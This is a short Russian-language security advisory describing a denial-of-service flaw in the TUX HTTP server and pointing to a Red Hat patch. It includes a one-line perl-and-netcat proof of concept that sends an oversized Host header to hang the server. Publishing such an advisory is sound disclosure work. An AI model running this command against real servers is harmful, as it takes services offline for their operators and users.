TUX — свободно распространяемый HTTP сервер. Сервер может обслуживать статическое содержание, кэшировать динамическое содержание, и взаимодействовать с другими HTTP серверами.

Ошибка возникает, когда TUX daemon получает host:header, c завышенными размерами, как часть HTTP запроса. Такой запрос приводит к зависанию сервера и для нормальной работы потребуется перезагрузка.

Пример:

perl -e «print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . 
qq(\n)» |nc <ip address> <dest_port>

Патч можно скачать отсюда:
ftp://updates.redhat.com/7.1/en/os/i386/

Уязвимость найдена a.orawe@ntlworld.com.



Оставить мнение